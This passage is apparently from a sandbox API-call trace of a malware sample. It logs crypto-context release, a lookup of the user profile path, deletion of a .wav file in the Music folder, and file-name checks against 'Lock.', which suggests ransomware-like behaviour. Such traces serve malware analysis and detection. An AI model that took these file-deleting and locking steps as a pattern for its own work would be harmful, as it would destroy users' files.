out: lpMsg=0x8cf140) returned 0 [0206.045] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0206.045] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0206.045] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0206.045] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0206.045] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0206.046] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0206.046] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0206.046] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0206.046] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0206.046] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.046] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0206.046] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.046] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0206.046] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.046] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.046] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0206.046] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0206.046] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0206.046] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0206.046] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0206.046] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0206.046] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.046] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0206.046] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0206.046] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0206.046] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0206.046] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0206.046] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.046] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0206.046] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0206.047] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0206.047] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0206.047] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0206.047] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0206.047] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0206.047] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0206.047] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0206.047] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0206.047] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0206.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6ea0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0206.047] CryptReleaseContext (hProv=0xa7c4c8, dwFlags=0x0) returned 1 [0206.047] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.047] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0206.047] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0206.047] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0206.047] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0206.047] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0206.047] FreeLibrary (hLibModule=0x76390000) returned 1 [0206.047] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.047] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.047] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.048] CloseHandle (hObject=0x50c) returned 1 [0206.050] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.050] CloseHandle (hObject=0x4ac) returned 1 [0206.052] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.054] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0206.054] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0206.054] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0206.054] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\erIdlI.wav", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\erIdlI.wav", lpFilePart=0x8cedf4*="erIdlI.wav") returned 0x20 [0206.055] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\erIdlI.wav" (normalized: "c:\\users\\fd1hvy\\music\\eridli.wav")) returned 0x20 [0206.055] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\erIdlI.wav", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefc63ec0, ftCreationTime.dwHighDateTime=0x1d5d4df, ftLastAccessTime.dwLowDateTime=0x3e509020, ftLastAccessTime.dwHighDateTime=0x1d5cb5a, ftLastWriteTime.dwLowDateTime=0x3e509020, ftLastWriteTime.dwHighDateTime=0x1d5cb5a, nFileSizeHigh=0x0, nFileSizeLow=0xe7e3, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="erIdlI.wav", cAlternateFileName="")) returned 0x9e1bf8 [0206.055] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\erIdlI.wav" (normalized: "c:\\users\\fd1hvy\\music\\eridli.wav")) returned 1 [0206.057] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefc63ec0, ftCreationTime.dwHighDateTime=0x1d5d4df, ftLastAccessTime.dwLowDateTime=0x3e509020, ftLastAccessTime.dwHighDateTime=0x1d5cb5a, ftLastWriteTime.dwLowDateTime=0x3e509020, ftLastWriteTime.dwHighDateTime=0x1d5cb5a, nFileSizeHigh=0x0, nFileSizeLow=0xe7e3, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="erIdlI.wav", cAlternateFileName="")) returned 0 [0206.057] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0206.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74a50 | out: hHeap=0x2af0000) returned 1 [0206.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0206.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0206.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0206.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0206.058] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0206.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0206.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0206.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0206.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0206.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0206.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0206.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0206.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0206.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0206.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0206.058] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0206.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0206.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0206.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5a0 [0206.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0206.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0206.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa798 [0206.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0206.059] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0206.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0206.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0206.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0206.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0206.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0206.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0206.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0206.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0206.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0206.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0206.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0206.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0206.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0206.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0206.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0206.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0206.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74ec8 [0206.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0206.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0206.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0206.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0206.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0206.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0206.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0206.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0206.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0206.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0206.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0206.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0206.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0206.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0206.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0206.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0206.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0206.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0206.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0206.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0206.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0206.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0206.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x42) returned 0x2a5d6b0 [0206.060] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\erIdlI.wav", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\erIdlI.wav", lpFilePart=0x8cf650*="erIdlI.wav") returned 0x20 [0206.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5d6b0 | out: hHeap=0x2af0000) returned 1 [0206.060] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\erIdlI.wav" (normalized: "c:\\users\\fd1hvy\\music\\eridli.wav")) returned 0xffffffff [0206.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74ec8 | out: hHeap=0x2af0000) returned 1 [0206.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0206.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0206.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0206.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0206.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0206.061] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0206.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0206.061] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0206.061] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0206.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0206.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0206.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0206.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0206.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0206.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0206.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0206.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0206.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0206.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0206.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0206.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0206.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0206.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JlLewkGtdwovoI.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lLewkGtdwovoI.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LewkGtdwovoI.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ewkGtdwovoI.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wkGtdwovoI.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kGtdwovoI.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GtdwovoI.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tdwovoI.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dwovoI.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wovoI.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ovoI.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="voI.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oI.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0206.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0206.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0206.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0206.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0206.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0206.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0206.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0206.062] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0206.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0206.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0206.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0206.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0206.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0206.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0206.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0206.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0206.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0206.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0206.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0206.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0206.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0206.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0206.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0206.062] HeapFree (in: 